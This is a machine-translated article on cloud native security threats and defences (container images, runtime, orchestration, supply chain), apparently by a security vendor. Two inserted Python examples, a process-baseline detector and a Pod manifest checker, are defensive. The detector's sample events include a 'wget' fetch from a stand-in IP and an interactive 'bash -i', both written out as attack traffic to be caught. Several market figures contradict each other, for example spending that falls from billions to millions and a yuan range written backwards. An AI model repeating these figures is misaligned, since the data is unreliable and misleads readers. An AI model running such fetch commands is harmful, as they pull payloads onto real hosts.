Cloud computing is the concentrated expression of IT development and service-model innovation, and an important change in, and inevitable trend of, the development of information technology. With the accelerated rollout of "new infrastructure" and the deepening digital transformation of enterprises, how to deepen cloud adoption and further improve the efficiency of cloud computing has become the focus of cloud computing development at this stage. Cloud native technology, with its efficiency, stability and fast response, has greatly unlocked the efficiency of cloud computing and become the driving force of digital business application innovation in enterprises. Cloud native technology has entered a stage of rapid development. Just as shipping containers accelerated the globalization of trade, cloud native technology is helping to popularize cloud computing and drive the digital transformation of enterprises.
The Cloud Native Computing Foundation (CNCF) defines cloud native technology as follows: cloud native technologies enable organizations to build and run flexible, scalable applications in modern dynamic environments such as public, private and hybrid clouds. Representative cloud native technologies include containers, service meshes, microservices, immutable infrastructure and declarative APIs.
# Development of the cloud security market #
Cloud security has developed almost in step with the cloud computing market. The rapid growth of cloud infrastructure investment undoubtedly provides fertile soil for the development of cloud security. According to IDC data, global cloud security spending in 2020 was only 1.1% of cloud IT spending, which shows that current cloud security spending is far from sufficient. Assuming this ratio rises to 5%, the global market space for cloud security would reach 5.32 billion US dollars in 2020 and 189 million US dollars in 2023.
Overseas cloud security market: technological innovation and M&A integration are active. Overall, the overseas cloud security market is in a stage of rapid development, with active technological innovation and frequent mergers and acquisitions. On the one hand, cloud security technology innovation is active and shows a trend toward convergence. For example, the Prisma product line of Palo Alto Networks, a comprehensive security company, unifies three cloud security products, CWPP, CSPM and CASB, into a comprehensive solution and offers a series of cloud security capabilities such as SASE, container security and micro-segmentation. On the other hand, emerging cloud security companies are developing rapidly, while traditional security vendors strengthen their cloud security portfolios through in-house development and acquisitions.
Domestic cloud security market: the market space is vast, but technology is still in a catch-up stage. In terms of market size, according to data from the China Academy of Information and Communications Technology (CAICT), the overall cloud computing market in China reached 1334.5 billion yuan in 2019, a growth rate of 38.6%. It is expected to remain in a stage of rapid growth from 2020 to 2022, with the market exceeding 375.42 billion yuan by 2023. Under a neutral assumption that security investment accounts for 3%-5% of the cloud computing market, China's cloud security market is estimated to reach 1126 billion-187.7 billion yuan in 2023. In terms of technology, there is still a gap between China and overseas markets in the development stage of cloud computing and the degree of cloud native adoption. CWPP technology is widely used in China, but emerging cloud security technologies such as CASB and CSPM are seldom used. However, with the accelerated development of the domestic public cloud market and the ever wider application of cloud native technology, we believe that emerging technologies such as CASB, CSPM and SASE will be used more and more widely in China.
# Cloud security is trending toward cloud native #
Cloud native technology has gradually become a new trend in the cloud computing market, and it brings more complex security issues. Cloud native technologies such as containers, service meshes and microservices are affecting the IT infrastructure, platforms and application systems of every industry, and are also spreading into new infrastructure such as the IT/OT-converged industrial Internet, IT/CT-converged 5G and edge computing. As cloud native is applied more and more widely, the related security risks and threats keep emerging. Security attacks against the cloud appear one after another, such as the exposure of Docker and Kubernetes services, the cryptomining incident in Tesla's Kubernetes cluster, container images on Docker Hub being "poisoned" with cryptomining programs, the large-scale Kubernetes cryptomining campaign detected by Microsoft Azure Security Center, and the spread of the Graboid cryptomining worm.
These security risks give a glimpse of the security situation of cloud native technology: there are still many security problems in the cloud native environment that urgently need to be solved. When cloud native technology is put into practice, security is an important factor that must be considered.
# Definition of cloud native security #
Organizations and enterprises at home and abroad interpret the concept of cloud native security slightly differently. Taking into account the state of the industry and its pain points in China, cloud native security, like cloud computing security, carries two meanings: "security for the cloud native environment" and "security with cloud native characteristics".
Security for the cloud native environment aims to protect the infrastructure, orchestration system and microservices in that environment. These security mechanisms do not necessarily have cloud native characteristics (such as containerization and programmability); they may be deployed in traditional ways or even as hardware appliances, but their role is to protect the increasingly popular cloud native environment.
Security with cloud native characteristics refers to security mechanisms that themselves have cloud native properties such as elasticity, agility, light weight and programmability. Cloud native is a conceptual innovation that reconstructs the traditional development and operations system through containerization, resource orchestration and microservices, and accelerates the speed at which business goes online and changes. The excellent characteristics of cloud native systems will therefore also inspire security vendors to reconstruct their security products and platforms and to change how they are delivered and updated.
# Cloud Native Security Concept Construction #
In order to alleviate the pain points of traditional security protection, help cloud computing become a more secure and trustworthy information infrastructure, and help cloud customers use cloud computing more safely, the concept of cloud native security has emerged, and third-party organizations and service providers at home and abroad have proposed building and developing cloud security with cloud native at its core.
Gartner advocates building a cloud security system with cloud native thinking.
The cloud security system proposed by Gartner, based on cloud native thinking, covers eight aspects. Among them, infrastructure configuration and identity and access management are provided by cloud service providers as basic capabilities; the other six, namely continuous cloud security posture management, all-round visibility, logging, audit and assessment, workload security, application, PaaS and API security, extended data protection, and cloud threat detection, need to be implemented by customers with security products.
Forrester evaluates the native security capabilities of public cloud platforms.
Forrester holds that the public cloud platform native security (PCPNS) of public cloud platforms should be measured in three categories and 37 aspects. Judging from the products and functions offered as well as future strategic planning, the first category examines the security capabilities and construction of the cloud service provider itself, such as data center security and internal personnel; the second is the basic security functions of the cloud platform, such as help and documentation, authorization and authentication; the third is the native security products provided to users, such as container security and data security.
Safedog builds cloud native security through four lines of protection work.
(1) Implement least privilege and defense in depth in line with how cloud native technology is actually deployed. For the various components of the cloud native environment, the principle of "shifting security left" can be applied and security baselines configured to prevent problems before they happen. For protecting microservice-architecture web applications and serverless applications, the focus is on application security.
(2) DevSecOps focuses on the life cycle of cloud native applications; the key technology stack of the current cloud native environment, "K8S+Docker", is taken as the example for analysis. Attention should be paid to three elements of the container life cycle: configuration and image security at build time, container access at deployment time, and the cloud compute, network and storage of the container runtime environment.
(3) Security implementation criteria are built for before, during and after an attack, and detection and defense work is carried out in these three stages according to those criteria.
(4) The transformation and comprehensive application of existing cloud security technologies: "cloud native security" should not be treated as an isolated proposition; technologies that provide more support for the cloud native environment, such as host security and micro-segmentation, can empower cloud native security.
# New Risks of Cloud Native Security #
The security risks of the cloud native architecture include the security risks of the cloud native infrastructure itself and the new or expanded security risks that arise after upper-layer applications undergo cloud native transformation. The cloud native environment faces severe security risks; important attack surfaces that attackers may use include, but are not limited to, container security, the orchestration system and the software supply chain. The important security risks of these attack surfaces are sorted out below.
# Cloud Native Security Issues #
Question 1: Container security
In building cloud native application and service platforms, container technology, with its high flexibility and agility, has become an important technical underpinning of cloud native application scenarios, so container security is also an important cornerstone of cloud native security.
(1) Insecure container images
Sysdig's report notes that production environments use public image registries as software sources, such as Docker Hub, the largest container image registry. On the one hand, many open source projects publish container images on Docker Hub; on the other hand, developers usually pull images from public repositories directly or customize their own images on top of these base images. The whole process is very convenient and efficient. However, image security on Docker Hub is not ideal, and many official images carry high-risk vulnerabilities. Using images with high-risk vulnerabilities greatly increases the intrusion risk for containers and hosts. At present, the security problems of container images mainly include the following three points:
1. Insecure third-party components
In practice, containerized applications are rarely built from scratch; instead, the developer's own programs and code are added to a base image, and the final business image is packaged and run online. As a result, many developers have no idea how many components the base image contains, and the more components it includes, the more vulnerabilities it may have.
2. Malicious images
Public image registries may contain malicious images uploaded by third parties. If containers are created from these malicious images, the security of the containers and applications will be affected.
3. Leakage of sensitive information
For convenience in development and debugging, developers store sensitive information such as database passwords, certificates and keys in configuration files. When the image is built, this sensitive information is packaged into the image together with the configuration file, which leads to its leakage.
(2) Containers are short-lived
Cloud native technology leads the business development of enterprises with its agile, reliable characteristics and has become the driving force of digital business application innovation. In the container environment, some containers are started and managed by docker commands, and a large number are started and managed by the Kubernetes container orchestration system, which makes building, deploying and running containers rapid and agile. The life cycle of a large number of containers is shorter than 1 hour, which greatly changes life-cycle protection compared with the traditional virtualization environment and introduces great variability into protecting the whole container life cycle. For the defender, it is necessary to combine traditional anomaly detection with behavior analysis to adapt to the short life cycle of containers.
Traditional anomaly detection uses WAF, IDS and similar devices, whose rule bases are already mature. Through this detection method, known threats can be displayed intuitively, and the method remains applicable in the container environment.
Traditional anomaly detection finds known threats quickly and accurately, but most unknown threats cannot be matched by a rule base, so a behavior analysis mechanism is needed to pick abnormal patterns out of a large number of patterns. Generally speaking, the business model of a production workload is relatively fixed, that is, business behavior is predictable: no matter how many containers are started, the behavior inside the containers is always similar. Through machine learning and the collection of process behaviors, reasonable baselines are constructed automatically, and these baselines are used to detect unknown threats in containers.
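The baseline-then-deviate approach just described, as an added example in Python (not code from the article or from any vendor it mentions): the process events are constructed sample data, baselines are learned per image rather than per container because containers are short-lived, and a (parent, child) executable pair must be seen in more than one training container before it counts as normal.

```python
"""Per-image process baselines for short-lived containers (added example).
Baselines are keyed by image, not container id: a container that lives under
an hour never accumulates history of its own, but every replica of the same
image behaves alike. All events below are constructed sample data."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    image: str      # image the container was started from
    container: str  # ephemeral container id
    parent: str     # executable that spawned the process
    exe: str        # executable that was started
    args: str = ""  # kept for the alert text only


def build_baseline(events, min_containers=2):
    """Learn, per image, the (parent, exe) pairs seen in at least
    `min_containers` distinct containers. Requiring support from more than
    one container stops a single odd training container from teaching the
    baseline that its behaviour is normal."""
    support = defaultdict(lambda: defaultdict(set))  # image -> pair -> {ids}
    for ev in events:
        support[ev.image][(ev.parent, ev.exe)].add(ev.container)
    return {image: {pair for pair, ids in pairs.items() if len(ids) >= min_containers}
            for image, pairs in support.items()}


def detect(baseline, events):
    """Alert on every event whose process lineage is outside the baseline
    learned for its image. This complements rule-based WAF/IDS detection:
    it needs no signature, only a deviation from the learned norm."""
    alerts = []
    for ev in events:
        allowed = baseline.get(ev.image)
        if allowed is None:
            alerts.append((ev.container, f"no baseline for image {ev.image}", ev.exe))
        elif (ev.parent, ev.exe) not in allowed:
            alerts.append((ev.container, f"unexpected {ev.parent} -> {ev.exe}", ev.args))
    return alerts


# Constructed learning window: several short-lived replicas of two images.
TRAINING = [
    ProcEvent("shop/web:1.4", "c01", "tini", "node"),
    ProcEvent("shop/web:1.4", "c01", "node", "sh", "-c 'echo ready'"),
    ProcEvent("shop/web:1.4", "c02", "tini", "node"),
    ProcEvent("shop/web:1.4", "c02", "node", "sh", "-c 'echo ready'"),
    ProcEvent("shop/web:1.4", "c03", "tini", "node"),
    ProcEvent("shop/web:1.4", "c03", "node", "curl", "localhost:8080/health"),  # seen once
    ProcEvent("shop/worker:2.0", "w01", "tini", "python"),
    ProcEvent("shop/worker:2.0", "w01", "python", "ffmpeg", "-i in.mp4"),
    ProcEvent("shop/worker:2.0", "w02", "tini", "python"),
    ProcEvent("shop/worker:2.0", "w02", "python", "ffmpeg", "-i in.mp4"),
]

# Constructed live events from brand-new containers of the same images.
LIVE = [
    ProcEvent("shop/web:1.4", "c77", "tini", "node"),
    ProcEvent("shop/web:1.4", "c77", "node", "sh", "-c 'echo ready'"),
    ProcEvent("shop/web:1.4", "c77", "sh", "wget", "http://203.0.113.9/x"),  # constructed
    ProcEvent("shop/worker:2.0", "w55", "tini", "python"),
    ProcEvent("shop/worker:2.0", "w55", "python", "bash", "-i"),
    ProcEvent("debug/tools:9", "c99", "sh", "id"),  # image never baselined
]


def run_demo():
    """Learn from TRAINING, then score LIVE; returns the alerts."""
    return detect(build_baseline(TRAINING), LIVE)


if __name__ == "__main__":
    for container, reason, detail in run_demo():
        print(f"ALERT {container}: {reason} ({detail})")
```

The one-off `curl` health check in the training window does not enter the baseline, so a single unusual training container does not silently widen what is considered normal.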
(3) Container runtime security
While container technology brings convenience, security hardening of running containers is often neglected. Because containers are short-lived and lightweight, installing anti-virus software on the host or virtual machine to protect a container running one or two processes is time-consuming and resource-consuming, yet in the eyes of attackers such containers are effectively running unprotected. The main concerns of container runtime security:
1. Insecure container applications
As in traditional web security, vulnerabilities such as SQL injection, XSS, RCE and XXE exist in the container environment. While providing services to the outside world, a container may be exploited by attackers, resulting in the container being compromised.
2. Container DDoS attacks
By default, docker does not restrict a container's resource usage: it can consume CPU, memory and disk resources without limit, enabling DDoS attacks of varying degrees.
(4) Container micro-segmentation
Compared with the traditional network, the life cycle of containers becomes shorter and they change faster in the container environment. There are complex access relationships between containers, and once the number of containers reaches a certain scale the east-west traffic produced by these relationships becomes extremely large and complicated. Therefore, network isolation in the container environment means not only isolation of the physical network, but also isolation between containers, between container groups and hosts, and between hosts.
Question 2: Cloud native compliance with Classified Protection
Classified Protection 2.0 (MLPS 2.0) puts forward security extension requirements to meet the specific security protection needs of new technologies and new application fields such as cloud computing, forming a new baseline standard for network security classified protection. Although the security extension requirements for cloud computing have been written, the writing cycle was long, virtualization scenarios were still mainstream at the time of writing, and cloud native scenarios such as containerization, microservices and serverless were not considered, so not all standards in Classified Protection 2.0 can be guaranteed to apply to the current cloud native environment.
From Safedog's experience and concrete practice in the field of cloud security, it is necessary to check the security of host accounts, set different accounts' access rights to different containers, and ensure that access control policies migrate with the containers through build, deployment and runtime.
For the control points of intrusion prevention, it is necessary to manage visually, draw the business topology, prevent host intrusion from all directions, control business traffic access, and detect the infection and spread of malicious code.
For the control points of image and snapshot protection, it is necessary to protect images and snapshots, ensure the integrity, availability and confidentiality of container images, and prevent the leakage of sensitive information.
Question 3: Host security
The container shares the operating system kernel with the host, so the host's configuration has an important impact on container security. For example, vulnerable software installed on the host may create a risk of arbitrary code execution, and unrestricted open ports may create a risk of arbitrary user access. Deploying a host intrusion monitoring and security protection system provides host asset management, host hardening, risk and vulnerability identification, intrusion prevention, isolation of problem hosts and other functions, which are linked together into a closed-loop security management system integrating collection, detection, monitoring, defense and capture. It provides all-round security protection for hosts, helps users locate compromised hosts in time, copes with known and unknown threats and risks, and avoids large-scale internal host security incidents.
Question 4: Orchestration system
The orchestration system supports many cloud native applications, such as serverless and service mesh. These new microservice systems also have security problems: for example, an attacker writes a piece of code to obtain shell access to a container, then penetrates the container network, causing huge losses.
Because of the complexity of the Kubernetes architecture, starting a Pod involves the API server, controller manager, scheduler and other components, so the security capability of each component is especially important. The authentication, authorization and access control provided by the API server, fine-grained access control, the key management provided by Secret resources, and the security and network policies available to the Pod itself can effectively harden Kubernetes.
Question 5: Software supply chain security
A project usually uses a large amount of open source software; according to Gartner, at least 95% of enterprises use open source software in key IT products. Open source software from the Internet may itself contain viruses, and we do not know which components it uses, so 0-day or N-day vulnerabilities may exist in it without our knowledge.
The vulnerabilities of open source software cannot be eliminated, and the security problems of the container itself may bring risks to every process in the development stage. What we can do is to evaluate and control software security reasonably from the development stage onward, following SDL principles, so as to improve the quality of the whole supply chain.
Question 6: The cost of security operations
Although a container's life cycle is short, protecting it covers everything. Across the whole container life cycle, anomaly detection and security protection are carried out during build, deployment and runtime, and this comes with high cost. Process detection and analysis of process behavior across thousands of containers consumes host processor and memory resources, log transmission occupies network bandwidth, and behavior detection consumes computing resources. When the number of containers in the environment is huge, the corresponding security operations cost rises sharply.
Question 7: How to improve the protection effect?
On the issue of security operations cost, we know that the cost of securely operating containers is very high. How can we reduce it while improving the protection effect? This brings in a popular term in the industry, "shifting security left": the software life cycle is laid out from left to right as development, testing, integration, deployment and operations, and shifting security left means moving security protection from the traditional operations end to the development end, mainly covering software design and development, software supply chain security and image security.
Therefore, in order to reduce the cost of security operations and improve operational efficiency in the cloud native scenario, we must first "shift left", that is, move from operations security to development security, mainly considering development security, software supply chain security, image security and configuration checking:
Development security
Teams need to pay attention to code vulnerabilities, for example by conducting code audits to discover vulnerabilities caused by a lack of security awareness and logic vulnerabilities caused by flawed code logic.
Supply chain security
Code checking tools can be used for continuous security assessment.
Image security
Use an image vulnerability scanning tool to continuously assess the images in your own registry and update risky images in time.
Configuration check
Checks cover exposure, host hardening, asset management, etc., making it harder for attackers to exploit vulnerabilities.
Question 8: Security configuration and key and credential management
Non-standard security configuration and poorly managed keys and credentials are also a major risk point for cloud native. There are many interactions between cloud native applications, middleware and back-end services. For simplicity, many developers store access credentials and key files directly in the code, or set the access credentials of some online resources to weak passwords, making it easy for attackers to gain access to sensitive data.
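As an added example in Python (not code from the article or from Safedog), the following configuration check applies several of the points above to a Kubernetes Pod manifest: it flags containers without CPU and memory limits (the unlimited-resource DDoS point in Question 1), credentials written as literal environment values or as weak passwords (Question 8), and credentials not sourced from a Secret resource (Question 4). The two manifests, the credential-name pattern and the weak-value list are constructed for illustration; the check works on an already-parsed manifest dict so it needs only the standard library.

```python
"""Pod manifest configuration check (added example, not from the article).
Operates on an already-parsed manifest (a dict, as a YAML loader returns)
so it runs with the standard library only. Both manifests are constructed."""
import re

# Env var names that usually carry a credential (constructed heuristic).
CRED_NAME = re.compile(r"PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE_KEY", re.I)
# A few obviously weak literal values (constructed list).
WEAK_VALUES = {"password", "123456", "admin", "root", "changeme", "test"}


def check_container(c, pod_name):
    """Return findings for one container spec."""
    where = f"{pod_name}/{c['name']}"
    findings = []
    # Docker and Kubernetes impose no limits unless asked: an unlimited
    # container can starve every neighbour on the node.
    limits = c.get("resources", {}).get("limits", {})
    for res in ("cpu", "memory"):
        if res not in limits:
            findings.append(f"{where}: no {res} limit")
    for env in c.get("env", []):
        name = env.get("name", "")
        if not CRED_NAME.search(name):
            continue
        if "value" in env:  # literal credential baked into the manifest
            value = str(env["value"])
            if value.lower() in WEAK_VALUES or len(value) < 8:
                findings.append(f"{where}: {name} is a weak literal credential")
            else:
                findings.append(f"{where}: {name} is hard-coded; use a Secret (secretKeyRef)")
        elif "secretKeyRef" not in env.get("valueFrom", {}):
            findings.append(f"{where}: {name} is not sourced from a Secret")
    return findings


def check_pod(pod):
    """Return all findings for a Pod manifest; an empty list means it passed."""
    name = pod.get("metadata", {}).get("name", "<unnamed>")
    spec = pod.get("spec", {})
    containers = spec.get("containers", []) + spec.get("initContainers", [])
    return [f for c in containers for f in check_container(c, name)]


# Constructed sample: the kind of manifest the article warns about.
WEAK_POD = {
    "metadata": {"name": "shop-api"},
    "spec": {"containers": [
        {"name": "api", "image": "shop/api:1.4",
         "env": [{"name": "DB_PASSWORD", "value": "admin"}]},
        {"name": "logger", "image": "shop/logger:2.0",
         "resources": {"limits": {"cpu": "250m"}},
         "env": [{"name": "API_KEY", "value": "constructed-key-0123456789"}]},
    ]},
}

# Constructed sample: the same Pod with limits set and the credential
# referenced from a Secret resource instead of written into the manifest.
HARDENED_POD = {
    "metadata": {"name": "shop-api"},
    "spec": {"containers": [
        {"name": "api", "image": "shop/api:1.4",
         "resources": {"limits": {"cpu": "500m", "memory": "256Mi"}},
         "env": [{"name": "DB_PASSWORD", "valueFrom": {
             "secretKeyRef": {"name": "shop-db", "key": "password"}}}]},
    ]},
}

if __name__ == "__main__":
    for finding in check_pod(WEAK_POD):
        print("FAIL", finding)
    print("hardened findings:", check_pod(HARDENED_POD))
```

Run in CI against every manifest before deployment, this is one concrete form of the "shift left" configuration check the article asks for: the weak Pod yields five findings, the hardened one none.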
# Future outlook for cloud native security #
Judging from the growing number of new attack threats, cloud native security will become key to future network security protection. With the continuous accumulation and technical improvement of ATT&CK, ATT&CK has also added a container matrix. ATT&CK stands for Adversarial Tactics, Techniques, and Common Knowledge. It is a knowledge base of attack behavior and a threat modeling framework, covering many threat groups and their tools and attack techniques. This open knowledge base of adversary tactics and techniques has had a wide and far-reaching impact on the security industry.
Attention to cloud native security has made an attack matrix for cloud containers emerge as the times require. ATT&CK lets us look at attackers and defensive measures from the perspective of behavior, so that relatively abstract container attack techniques and tools can be traced. Using the ATT&CK framework to simulate red-blue confrontation and evaluate an enterprise's current security capability is of great reference value for improving its security protection capability.